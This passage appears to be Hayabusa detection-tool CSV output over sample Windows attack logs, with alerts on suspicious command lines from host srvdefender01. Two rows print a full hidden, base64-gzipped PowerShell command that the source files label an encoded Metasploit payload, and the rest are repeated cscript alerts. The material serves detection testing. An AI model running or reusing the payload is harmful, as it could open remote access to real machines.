C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
